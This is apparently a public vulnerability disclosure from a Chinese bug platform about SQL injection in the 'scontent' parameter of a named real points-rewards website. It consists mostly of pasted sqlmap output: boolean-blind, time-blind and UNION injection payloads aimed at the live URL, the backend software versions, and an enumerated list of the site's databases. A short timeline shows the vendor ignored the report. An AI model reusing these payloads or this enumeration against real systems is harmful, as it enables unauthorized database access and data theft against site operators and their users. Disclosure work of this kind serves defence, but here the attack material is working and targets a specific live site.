2015-12-18: 细节已通知厂商并且等待厂商处理中 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
坐等忽略
http://jifen.dodopal.com/index.php/rewards-so_showlist-1.html?scontent=*参数 scontent 可注入
DBA权限
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 266 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' AND 3325=3325 AND 'olxi' LIKE 'olxi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' AND (SELECT * FROM (SELECT(SLEEP(5)))aYOr) AND 'SjRO' LIKE 'SjRO Type: UNION query Title: Generic UNION query (NULL) - 97 columns Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6271,0x4c52597876594f536443,0x71626b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[00:21:56] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.0.12[00:21:56] [INFO] fetching database namesavailable databases [8]:[*] dodobao[*] information_schema[*] integral[*] mysql[*] performance_schema[*] test[*] wxdodopal[*] wxdodopalwe7[00:21:56] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\jifen.dodopal.com'[*] shutting down at 00:21:56
呵呵哒
危害等级:无影响厂商忽略
忽略时间:2015-12-23 01:10
漏洞Rank:4 (WooYun评价)
暂无
